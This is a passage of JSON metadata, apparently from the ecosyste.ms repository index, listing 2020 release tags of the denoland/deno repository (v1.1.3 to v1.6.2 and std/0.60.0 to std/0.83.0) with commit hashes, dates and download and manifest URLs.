/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{